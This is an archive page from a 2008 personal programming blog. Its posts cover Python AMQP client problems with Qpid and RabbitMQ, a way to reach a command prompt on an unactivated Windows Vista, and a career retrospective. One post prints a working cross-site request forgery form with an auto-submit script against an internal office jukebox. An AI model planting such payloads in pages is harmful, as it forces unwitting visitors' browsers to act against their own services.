2008-11-21

AMQP? Maybe not yet. At least not with Python.


In my last Python project I thought about using AMQP messaging. A quick look at Python AMQP libraries shows two possibilities:
Both libraries are developed tightly with their brokers: Apache uses Qpid, py-amqplib uses RabbitMQ.

Apache Qpid

I started my adventure by downloading the source. They don’t have binary packages so this is what’s needed:
$ wget http://www.apache.org/dist/incubator/qpid/M3-incubating/qpid-incubating-M3.tar.gz
$ tar xvzf qpid-incubating-M3.tar.gz
$ cd qpid-incubating-M3/
Hmm. What’s next... No README files... After some googling I found that there’s getting stated guide. Following it this should be the magic command:
$ cd java/broker
$ PATH=$PATH:bin QPID_HOME=$PWD ./bin/qpid-server -c etc/persistent_config.xml
./bin/qpid-server: line 37: qpid-run: No such file or directory
Okay, let’s look for the missing file somewhere:
$ find ../.. -name qpid-run
../../java/common/bin/qpid-run
$ cp ../../java/common/bin/qpid-run bin
Next try:
$ PATH=$PATH:bin QPID_HOME=$PWD ./bin/qpid-server -c etc/persistent_config.xml
Setting QPID_WORK to /home/majek as default
System Properties set to -Damqj.logging.level=info -DQPID_HOME=/home/majek/b/qpid-incubating-M3/java/broker -DQPID_WORK=/home/majek
Using QPID_CLASSPATH /home/majek/b/qpid-incubating-M3/java/broker/lib/qpid-incubating.jar:/home/majek/b/qpid-incubating-M3/java/broker/lib/bdbstore-launch.jar
Info: QPID_JAVA_GC not set. Defaulting to JAVA_GC -XX:+UseConcMarkSweepGC -XX:+HeapDumpOnOutOfMemoryError
Info: QPID_JAVA_MEM not set. Defaulting to JAVA_MEM -Xmx1024m
Exception in thread "main" java.lang.NoClassDefFoundError: org/apache/qpid/server/Main
Caused by: java.lang.ClassNotFoundException: org.apache.qpid.server.Main
That’s enough. I’m definitely too stupid to run this server and too busy to waste more time here (there is also other reason why I’m not really interested in qpid, read on).

py-amqplib + RabbitMQ

Here installation went smoothly.
$ python easy_install amqplib
The broker:
$ wget http://www.rabbitmq.com/releases/rabbitmq-server/v1.4.0/rabbitmq-server_1.4.0-1_all.deb
$ sudo dpkg -i rabbitmq-server_1.4.0-1_all.deb

The good

I also downloaded the py-amqlib sources and found out that the examples are working out of the box:
~/amqplib-0.5/demo$ ./demo_send.py  1
~/amqplib-0.5/demo$ ./demo_receive.py
Most common way of using Barry’s library is to write software that only consumes data from AMQP. Use one event loop that blocks forever and when something happens on AMQP the callback is executed. I have slightly different use case. In the project I’m writing I use asynchronous programming. This means that I have one event loop that is not the AMQP event loop. I want to run AMQP stack every time something happened on a socket. This is how it would look like in pseudocode:
while True:
nonblocking_consume_amqp_events()
<magically_wait_for_activity_on_amqp_socket>
Qpid python client has only blocking interface, so it’s impossible to write code like that. Fortunately there’s a nonblocking client in Barry’s library. There’s even an example:
./nbdemo_receive.py

The bad

The demo doesn’t work correctly when there are more messages in the queue and fails not very nicely with this traceback:
Traceback (most recent call last):
[...]
File "build/bdist.linux-i686/egg/amqplib/nbclient_0_8.py", line 74, in write
P' read_buf='&!amq.ctag-FC3ET7kTcqy/A93gJYQWqw==6!amq.ctag-FC3ET7kTcqy/A93gJYQWqw==myfan2

Above bug is triggered by basic_ack. So I removed that command - I stopped sending message acknowledges. Now the order of delivering messages got broken:
['1', '1']
['2', '1', '2']
['3', '1', '2', '3']
['4', '1', '2', '3', '4']
If the problem is with acknowledges, then one could say to use no_ack on a channel and just disable acknowledges. Sorry, this also doesn’t work.
I send ten messages:
['a_0', 'a_1', 'a_2', 'a_3', 'a_4', 'a_5', 'a_6', 'a_7', 'a_8', 'a_9']
Then another ten:
['b_0', 'b_1', 'b_2', 'b_3', 'b_4', 'b_5', 'b_6', 'b_7', 'b_8', 'b_9']
I receive:
['b_0', 'b_1', 'b_2', 'b_3', 'b_4', 'b_5', 'b_6', 'b_7', 'b_8', 'b_9',
'a_0', 'a_1', 'a_2', 'a_3', 'a_4', 'a_5', 'a_6', 'a_7', 'a_8', 'a_9',
'b_0', 'b_1', 'b_2', 'b_3', 'b_4', 'b_5', 'b_6', 'b_7', 'b_8', 'b_9']
While I was working at this issue I was worried that my Python process is eating more and more memory. After some debugging I discovered that amqplib has very nice memory leaks (okay, reference cycles).

The ugly

After few days I finally managed to create nonblocking code that I needed. But it’s really ugly:
def my_nb_callback(ch):
raise MException
conn = nbamqp.NonBlockingConnection('localhost',
userid='guest', password='guest',
nb_callback=my_nb_callback, nb_sleep=0.0)

ch = conn.channel()
ch.access_request('/data', active=True, read=True)

ch.exchange_declare('myfans', 'fanout', auto_delete=True)
qname, _, _ = ch.queue_declare()
ch.queue_bind(qname, 'myfans')

msgs = []
def callback(msg):
msgs.append( msg )

ch.connection.sock.sock.setblocking(False)
ch.basic_consume(qname, callback=callback)
while True:
msgs = []
<magically_wait_for_data_on_ch.connection.sock.sock>
try:
nbamqp.nbloop([ch])
except MException:
pass
unique_msgs_filter = {}
unique_msgs = []
for msg in msgs:
msg.channel.basic_ack(msg.delivery_tag)
if msg.body not in unique_msgs_filter:
unique_msgs_filter[msg.body] = True
unique_msgs.append(msg.body)
print '%r ' % (unique_msgs)


Back to RabbitMQ

For this simple research Rabbit works perfectly just out of the box. For a moment I even forgot that python library is not all of the software involved. But when I wanted to see some more details about it, things became messy:
$ rabbitmqctl --help
Password:
Which password would you like? Even if I know that, I’m not going to give any passwords away to see the help message, sorry. Next try:
$ rabbitmq-server --help
/usr/sbin/rabbitmq-server: 44: cannot create /var/log/rabbitmq/rabbit.log.bak: Permission denied
/usr/sbin/rabbitmq-server: 45: cannot create /var/log/rabbitmq/rabbit-sasl.log.bak: Permission denied
{error_logger,{{2008,11,21},{0,26,12}},"Protocol: ~p: register/listen error: ~p~n",["inet_tcp",einval]}
{error_logger,{{2008,11,21},{0,26,12}},crash_report,[[{pid,<0.22.0>},{registered_name,net_kernel},{error_info,{error,badarg}},{initial_call,{gen,init_it,[gen_server,<0.19.0>,<0.19.0>,{local,net_kernel},net_kernel,{rabbit,shortnames,15000},[]]}},{ancestors,[net_sup,kernel_sup,<0.9.0>]},{messages,[]},{links,[<0.19.0>]},{dictionary,[{longnames,false}]},{trap_exit,true},{status,running},{heap_size,377},{stack_size,21},{reductions,309}],[]]}

Conclusion
Even if the AMQP protocol is great, AMQP user stack still needs a lot of polish in my opinion.

Update #1:
rabbitmq-discuss thread


2008-11-18

How to escape from blocked unactivated Vista

Few times I was pissed off by this screen:
It means that I haven't activated Vista on time and Microsoft stopped liking me. The problem is that at least two times I was caught by this screen when I haven't got access to the net. I had password to WiFi, but haven't entered it yet. When Vista is blocked you don't have access to any networking settings so the password is useless. Yet another time, because of bug in Vista I needed to reenter my windows key. Of course the easiest way to get the key is to use KeyFinder rather than waste time on searching the key. Which, in the end, would probably be somewhere online - like in MSDNAA.

Fortunetely you can easily escape from the blocked Vista. This is how you can do it. After clicking "Activate now" this screen appears:

Just choose "buy a new product key online", which would spawn a new browser window. I had Opera set as default browser, but any browser should work. The trick is to enter "c:\windows\system32\cmd.exe" as the url.
We want to run this magic program.
Next, the well known black cmd dialog should appear. We're back home :) Just enter "explorer" to run the usual windows Start menu and task bar.
That's it. You now have normal access to your computer. You can then configure wireless networks or do whatever you like.

The only problem is to remember this instructions in case you won't have access to the internet.



2008-11-17

Tracing Python memory leaks

Tracing Python memory leaks.



2008-11-11

Simple inter-process locks

At LShift blog I wrote about simple inter process locks in Python.



2008-11-10

Youtube - a team of highly trained monkeys...


In translation "A team of highly trained monkeys has been dispatched to deal with this situation."

I'm not the only one to see this message. I think it's even better than "you broke reddit" message.



2008-11-04

Jukebox XSRF


In Lshift we use Tony’s erlang jukebox, it's great, anyone can play music at the office. I found XSRF there and exploited it maliciously. Every time someone from inside the office opens this blog, Britney is being played.

The exploit is not especially complicated:
<form id='f' method="post" enctype="text/plain"
action="http://jukebox/rpc/jukebox" >
<input
name='{"version":"1.1","id":287,"method":"enqueue","params":["x'
value='x",[{"id":["jukebox@xxxx",[1,1,1]],"url":"http://[...]one%20more%20time.mp3","username":null}],false]}'>
</form>

<script>
f.submit()
</script>
The hardest part was to hide somewhere the equal sign from the syntax key=value that's used when encoding is text/plain. My code inserts equal sign into the song owner json field.

That's it. It's quite hard to avoid such issues. I prefer checking the referer field on all incoming POST queries, but this method also is not perfect.

So beware of XSRF!


Update #1:
I removed this malicious feature from this blog. I don't want to loose potential readers from inside Lshift office. I'm also not a fan of Britney...


2008-11-02

Blog success story

The beginnings

I wrote first post in this blog 22 months* ago. My intentions weren’t clear. I wanted to document my ideas (I had a lot of them), have a place to store code snippets and maybe promote myself.

First posts I wrote in Polish and didn’t really know if I will be able to write in English. When look at my first posts, I start to understand that they were just testing the territory. I didn’t know what to write about, how far I can go writing, who will be reading it, if the crawlers will catch it and how many private things I can publish.

For example, in one of my stupidest posts I wrote that "the term of the week is inwalidacja".


The job

There are two most important factors when you’re making a decision of choosing an employer:
  • who is the smartest in the room (you shouldn’t choose the job if you are the one)
  • how far is to the kettle (the closer, the better)
I applied to few companies, including Opera and Google. What I can say, is that I liked very much the recruiters at Opera and I have a bad opinion on Google ones. On the other hand Google technical stuff is very good and I have mixed feelings about Opera’s staff. I used an old trick and asked a technical question through the technical director of Opera, but got no answer from staff. The trick stopped working or the communication inside their company really sucks. I also don’t have good feelings about applying to Google. It’s like a hazard. If you will loose once, please, try again. The recruiters don’t know anything apart from the marketing bullshit. Applying for a job there is really a random. You don’t know where you be working, what exactly you will do, with whom you will be working, how much you can get for your work, and how far are you going to be from the kettle (are you feeling lucky enough to apply there?). I’m rather immune to marketing talks and I have really no idea how it’s inside Google (ie: where the kettles are). One more thing, I heard that people inside the Microsoft were relocating, but never heard a story about relocating inside Google (except from the management).

All of my Google pens are broken, Opera pen is still in perfect condition.

I should also write a word about a Flumotion, very nice company from Barcelona. They are a very open-source friendly company and they have extremely interesting technology. They are becoming a bit too corporative in my opinion. On the other hand I really love their clear and stable business model.


The results

I learned a lot of things while writing this blog. First, I improved my writing skills, though I still have a lot to learn. Blogging gave me huge motivation to finish projects, to sort my ideas, to document my interests.

Some posts were written especially to gain attention. Other posts were talking about my broken software and gained popularity without the intention.

The blog really helped me to document my things. For example I’m still interested in a crazy idea of implementing mutexes based on strace.


I spend really a lot of time writing posts here, but it was not a wasted time. I always thought about it as an investment, without really knowing in what I’m investing.

I’m especially proud about the keywords that are pushing people towards my blog. I never wanted to specialize in a specific sector of IT, but I never thought I would get so wide audience. Here are the some popular keywords that linked towards my blog: popcnt (of course), python libevent, google app engine ssl (hey, Google, people do need ssl for GAE!), bidirectional search, msg_oob, gcc extensions, python process name, _mm_stream_si32, django comet, libevent example, linkedin graph, pcap example, nmap nse, python pthread, 8gb ram 64 bit, epoll, inwalidacja and (my favorite) concurrent programming.



Lshift office
The job #2

Recently I got a good job at Lshift. It’s hard to say how important the blog was in getting this job, but for sure it had an impact.

I’m still rather young, so it’s hard for me to make a valuable comparison how good Lshift is, but from what I’ve seen it seems really promising. In the end, Lshift is also an assembler operation, just like Popcnt. And I have a desk not so far from the kettle.



Cisco NSLU2, Slugs, used for testing the RabbitMQ at LShift
The future

I don’t know if I’m still going to have a lot of things to write about. Probably some of my blogging will go to Lshift’s blog. But it’s too soon to say how much.


The conclusion

If you ever thought about writing a blog, just do it. Register some stupid name at blogspot and think of better domain later. Start with anything, thoughts, ideas, stuff you’re working at (you’ll have an unique opportunity to piss up your boss).

I have no idea if I really gained a success, time will tell. I got a job and relocated, that’s it, nothing special. But this is what I wanted to achieve.




*
Code snippet, 22 months:
>>> datetime.datetime.now()-dateutil.relativedelta.relativedelta(months=22)
datetime.datetime(2007, 1, 2)